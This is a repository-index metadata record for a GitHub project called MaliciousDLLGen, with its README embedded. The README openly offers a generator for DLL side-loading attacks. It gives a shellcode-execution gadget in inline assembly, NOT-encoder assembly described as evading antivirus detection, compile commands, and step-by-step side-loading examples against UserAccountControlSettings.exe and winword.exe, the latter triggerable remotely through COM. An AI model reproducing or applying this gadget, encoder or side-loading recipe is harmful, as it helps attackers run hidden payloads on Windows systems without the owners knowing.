{"id":17101925,"url":"https://github.com/nullarray/maliciousdllgen","last_synced_at":"2025-10-28T09:49:40.797Z","repository":{"id":140847975,"uuid":"278102777","full_name":"NullArray/MaliciousDLLGen","owner":"NullArray","description":"Malicious DLL Generator in Py3","archived":false,"fork":false,"pushed_at":"2020-07-08T14:05:21.000Z","size":12,"stargazers_count":26,"open_issues_count":0,"forks_count":5,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-09-02T11:34:42.190Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/NullArray.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2020-07-08T13:53:04.000Z","updated_at":"2024-08-12T20:03:30.000Z","dependencies_parsed_at":null,"dependency_job_id":"9bd73b20-6a44-4ef7-9006-039e9ab8f163","html_url":"https://github.com/NullArray/MaliciousDLLGen","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/NullArray/MaliciousDLLGen","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Nul
lArray","download_url":"https://codeload.github.com/NullArray/MaliciousDLLGen/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281418065,"owners_count":26497723,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-28T02:00:06.022Z","response_time":60,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-14T15:27:27.678Z","updated_at":"2025-10-28T09:49:40.776Z","avatar_url":"https://github.com/NullArray.png","language":"C","readme":"# MaliciousDLLGenerator\n\nDLL Generator for side-loading attacks (Python 3 Compatible Version)\n\n## Note\n\nThis project was originally created by Mr.Un1k0d3r of RingZer0 Team. I couldn't find a repository\nfor the original or I would have submitted a Pull Request. In lieu of that I decided to host it here.\n\nAll credit goes to Mr.Un1k0d3r and RingZer0 Team. All I did was make it Python 3 compatible.\n\n### Currently only supports 64-bit shellcode\n\n# Usage\n\n```\n$ python gen-dll.py -h\n\nMaliciousDLLGenerator - Mr.Un1k0d3r - RingZer0 Team\n---------------------------------------------------\n\n\n[-] Shellcode size is limited to 1024 bytes\nusage: gen-dll.py [-h] -o OUTPUT -s SHELLCODE [-t TYPE]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -o OUTPUT, --output OUTPUT\n                        Output filename\n  -s SHELLCODE, --shellcode SHELLCODE\n                        Raw shellcode file path\n  -t TYPE, --type TYPE  DLL type (default,oart)\n```\n\n# Shellcode gadget\n\nInstead of using the standard shellcode calling structure\n\n```\nchar shellcode[] = {};\nint(*execute)(void);\nexecute = (int(*)())shellcode;\nexecute();\n```\n\nwhich results in the following assembly code\n\n```\ncall rax\n```\n\nthe DLL mimics a standard function return by using the following code\n\n```\n        CHAR payload[] = \"\";\n        asm volatile (\"mov %%rax, %0\\n\\t\"\n                     \"push %%rax\\n\\t\"\n                     \"ret\"\n                     :\n                     : \"r\" (payload));\n```\n\nwhich results in the following assembly code\n\n```\nmov rax, rsp\npush rax\nret\n```\n\n# Compiling from source using GCC\n\n```\nC:\\\u003e x86_64-w64-mingw32-g++.exe -Wall -DBUILD_DLL -O2 -c maindll.cpp -o maindll.o\nC:\\\u003e x86_64-w64-mingw32-g++.exe -shared -Wl,--dll maindll.o -o yourdll.dll -s \n```\n\n# Compiling from ASM\n\n64-bit\n\n```\n$ nasm -felf64 encoder-64.asm -o encoder-64.o\n$ ld -N encoder-64.o -o encoder-64\n```\n\n32-bit\n\n```\n$ nasm -felf32 encoder-32.asm -o encoder-32.o\n$ ld -N -melf_i386 encoder-32.o -o encoder-32\n```\n\n# Shellcode obfuscation\n\nThe DLL encodes the shellcode using a simple NOT encoder to avoid AV detection.\n\n# 64-bit NOT encoder source\n\n```\n_start:\n        call $ + 5\n        pop rbx\n        xor rax, rax\n        mov rcx, rax\n        mov cl, 128\n        add rbx, 16\n_loop:\n        not QWORD [rbx + rcx * 8]\n        loop _loop\n        add rbx, 8\n        push rbx\n        ret\n```\n\n# 32-bit NOT encoder source\n\n```\n_start:\n        call $ + 5\n        pop ebx\n        xor eax, eax\n        mov ecx, eax\n        mov cx, 256\n        add ebx, 18\n_loop:\n        not DWORD [ebx + ecx * 4]\n        loop _loop\n        add ebx, 4\n        push ebx\n        ret\n```\n\n# Attack examples\n\nUsing Windows binaries\n\n```\ncopy C:\\windows\\system32\\UserAccountControlSettings.exe to a writable location\nadd the malicious dll in the same folder and rename it to cryptbase.dll\n```\n\n```\ncopy C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\winword.exe to a writable location\nadd the malicious dll (use the oart switch) in the same folder and rename it to oart.dll\n\nIt can be triggered remotely using a COM object. Winword can be started without a GUI using the following command:\nC:\\yourpath\\winword.exe /Automation -Embedding\n```\n\n# Credit\n\nMr.Un1k0d3r, RingZer0 Team\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnullarray%2Fmaliciousdllgen","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnullarray%2Fmaliciousdllgen","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnullarray%2Fmaliciousdllgen/lists"}